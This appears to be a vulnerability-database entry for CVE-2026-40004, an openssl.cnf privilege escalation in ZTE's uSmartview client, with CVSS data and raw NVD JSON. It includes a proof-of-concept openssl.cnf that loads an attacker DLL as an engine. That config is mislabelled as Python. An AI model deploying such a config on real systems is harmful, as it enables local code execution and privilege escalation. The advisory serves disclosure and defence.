CVE-2026-40004

Description

There exists an openssl.cnf privilege escalation vulnerability in ZTE Cloud PC client uSmartview. An attacker can execute arbitrary code locally and escalate privileges.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:P/AC:H/PR:L/UI:R/S:C/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:zte:zxcloud_irai:*:*:*:*:*:*:*:* - VULNERABLE

ZTE Cloud PC client uSmartview (具体版本请参考官方公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Malicious openssl.cnf configuration
# Place this file in the vulnerable application's config path

openssl_conf = openssl_init

[openssl_init]
engines = engine_section

[engine_section]
payload = payload_section

[payload_section]
engine_id = payload
dynamic_path = C:\Temp\exploit.dll
init = 0

# Explanation:
# The application loads this config file during startup.
# It attempts to load an engine DLL defined by 'dynamic_path'.
# The exploit.dll contains the malicious code to be executed.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-40004
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-40004
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-40004/
[4] VulDB https://vuldb.com/cve/CVE-2026-40004
[5] https://support.zte.com.cn/zte-iccp-isupport-webui/bulletin/detail/3126272076755775573

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-40004", "sourceIdentifier": "[email protected]", "published": "2026-05-07T04:16:23.073", "lastModified": "2026-05-13T19:17:35.650", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "There exists an openssl.cnf privilege escalation vulnerability in ZTE Cloud PC client uSmartview. An attacker can execute arbitrary code locally and escalate privileges."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:H/PR:L/UI:R/S:C/C:H/I:L/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.3, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-427"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zte:zxcloud_irai:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.23.20", "versionEndExcluding": "7.25.43", "matchCriteriaId": "C6E53081-879B-41EE-AAEA-1D5EC10B8721"}]}]}], "references": [{"url": "https://support.zte.com.cn/zte-iccp-isupport-webui/bulletin/detail/3126272076755775573", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}